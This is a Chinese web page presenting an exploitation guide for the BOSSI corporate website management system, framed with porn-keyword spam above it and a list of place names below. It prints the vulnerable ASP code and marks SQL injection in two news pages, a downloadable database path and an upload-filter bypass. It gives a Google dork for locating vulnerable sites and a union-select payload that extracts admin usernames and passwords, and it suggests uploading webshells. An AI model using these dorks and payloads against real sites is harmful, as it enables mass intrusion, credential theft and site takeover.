最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

BOSSI 公司企業(yè)網(wǎng)站管理系統(tǒng)注入&上傳漏洞利用

  發(fā)布時(shí)間:2011-12-28 17:06:21   作者:佚名   我要評論
BOSSI 公司(企業(yè))網(wǎng)站管理系統(tǒng),中英文雙語版,后臺在同一頁內(nèi)同時(shí)管理添加修改資料內(nèi)的中英文內(nèi)容,網(wǎng)站的左邊欄使用了模塊,可以自由的增加&刪除,可以不用修改代碼
讓不懂編寫網(wǎng)頁的人也可以有自己的公司(企業(yè))網(wǎng)站,基本資料都在后臺管理添加修改,網(wǎng)站的標(biāo)題、地址、版權(quán)、公司郵局、收藏等資料可以在后臺的"公司資料"里管理

----------------------------------------------------
漏洞一:注入漏洞,

漏洞頁面:NewsInfo.asp,

漏洞代碼:if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Conews where id="&id, conn,3,3
'紀(jì)錄訪問次數(shù)
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")

id變量未處理直接代入sql查詢,可注射,用啊d就行

頁面二:yeNewsInfo.asp

漏洞代碼:<%
if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Yenews where id="&id, conn,3,3
'紀(jì)錄訪問次數(shù)
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
'定義內(nèi)容
content=ubbcode(rs("content"))
%>

原理同上,可注入。

漏洞二:數(shù)據(jù)庫下載漏洞

數(shù)據(jù)庫地址:Database/DataShop.mdb

為建立放下載表,可任意下載!

漏洞三:上傳漏洞

漏洞頁面:upfile.asp ,upfilea.asp

問題代碼:fileExt=lcase(file.FileExt)
   Forumupload=split(UpFileType,"|")
   for i=0 to ubound(Forumupload)
    if fileEXT=trim(Forumupload(i)) then
     EnableUpload=true
     exit for
    end if
   next
   if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
    EnableUpload=false
   end if
   if EnableUpload=false then
    msg="這種文件類型不允許上傳!\n\n只允許上傳這幾種文件類型:" & UpFileType
    founderr=true
   end if

和那個(gè)良精的上傳漏洞一樣,不知道是誰抄誰的代碼了!注冊用戶,本地上傳php的大馬或者加空格過濾上傳asp大馬,具體方法我就不說了,在淺析良精企業(yè)網(wǎng)站管理程序一文中提到過了!不再贅述!

漏洞利用:注入,Google:inurl:yeNewsInfo.asp?Id

注入語句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User

 

或者啊d:需要手動(dòng)添加表段:Bs_User

數(shù)據(jù)庫漏洞利用:

挖掘機(jī):關(guān)鍵字:inurl:yeNewsInfo.asp?Id

后綴:Database/DataShop.mdb

關(guān)于上傳漏洞的利用我就不演示了,可參照 淺析良精企業(yè)網(wǎng)站管理系統(tǒng)漏洞 一文。

相關(guān)文章

最新評論

万全县| 城固县| 东宁县| 岱山县| 晋江市| 积石山| 红桥区| 灌南县| 罗江县| 门头沟区| 吉木萨尔县| 郁南县| 沙雅县| 酉阳| 定襄县| 巴林右旗| 广宁县| 新田县| 宁海县| 长顺县| 新田县| 偃师市| 揭阳市| 岱山县| 阿坝县| 霞浦县| 荃湾区| 海丰县| 图们市| 永年县| 盐源县| 聊城市| 崇阳县| 平利县| 炎陵县| 青神县| 宝鸡市| 治多县| 徐水县| 敦化市| 湘乡市|